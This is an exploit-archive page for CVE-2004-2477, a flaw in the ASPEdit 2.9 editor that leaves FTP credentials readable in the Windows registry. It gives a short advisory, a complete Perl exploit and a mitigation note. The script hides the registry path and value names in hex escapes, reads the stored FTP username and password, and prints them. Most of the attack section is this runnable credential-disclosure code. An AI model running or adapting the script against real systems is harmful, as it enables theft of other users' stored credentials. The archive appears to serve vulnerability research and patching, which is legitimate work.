Advertisement






ASPEdit FTP Password Disclosure

CVE Category Price Severity
CVE-2004-2477 CWE-200 $500 High
Author Risk Exploitation Type Date
Tom Ferris High Remote 2005-10-06
Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2005090030

Below is a copy:

Version:
ASPEdit  2.9

Operating System:
- All Windows

Typical software:
- Shareware

Severity Flaw:
- high

Description:
ASPEdit is a powerfulActive Server Pages and HTML editor with full support for Visual BasicScript, Perl, Cold-fusion, PHP3, MIVA ,HDML, WML and Style sheets

Vulnerability:
A stored for administration password are captured at the Registry Editor,this could local user/guest to see then retrive 
the password as they have privillage to open registry editor by search specified vulnerable registry values.

Exploit:
#!usr/bin/perl
#
# ASPEdit FTP Password Disclosure Exploit
# ---------------------------------------
#   Infam0us Gr0up - Securiti Research
#
# Info: infamous.2hell.com
# Vendor URL: http://www.tashcom.co.uk/aspedit
#


use Win32::Registry;

print "\nASPEdit FTP Password Disclosure Exploit\n";
print "---------------------------------------\n\n";
print "Registrie: HLKM\\SOFTWARE\\tashcom\\aspedit\\ftp\n";
sleep(1);

$usr = 
"\x66\x74\x70\x5f\x75\x73\x65\x72";
$pas = 
"\x66\x74\x70\x5f\x70\x61\x73\x73\x77\x6f\x64";

$nutt =
"\x53\x4f\x46\x54\x57\x41\x52\x45\x5c\x5c".
"\x74\x61\x73\x68\x63\x6f\x6d\x5c\x5c\x61".
"\x73\x70\x65\x64\x69\x74\x5c\x5c\x66\x74\x70";

print "[+] Start searching..\n";
print "[+] Finding username ..";
my $user;
$::HKEY_LOCAL_MACHINE->Open("$nutt", $user)
or die "Can't open username value: $^E";
sleep(1);
print "[OK]\n";
print "[+] Query value username..";
my ($type, $value);
$user->QueryValueEx("$usr", $type, $value) or die "No such user: $^E";
sleep(1);
print "[OK]\n";

print "[+] Finding password ..";
my $pass;
$::HKEY_LOCAL_MACHINE->Open("$nutt", $pass)
or die "Can't open password value: $^E";
sleep(1);
print "[OK]\n";
 print "[+] Query value password..";
my ($type1, $value2);
$pass->QueryValueEx("$pas", $type1, $value2) or die "No such password: $^E";
sleep(2);
print "[OK]\n";
print "[+] Retrive data registry..\n";
sleep(1);
print "[*] User: $value\n";
print "[*] Password: $value2\n";

Solution:
On the registry Editor changes the registry path then try to encrypt 
the password,it more safety.
Also set them whit permission(Advanced Security Setting),can be found  
by rigth click the 'key'value then choose 'permission'.

Vendor URL:
Mail - [email protected] 
WWW - http://www.tashcom.com

Published:
basher13 (Infam0us Gr0up - Securiti Research)
[email protected] / infamous.2hell.com

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum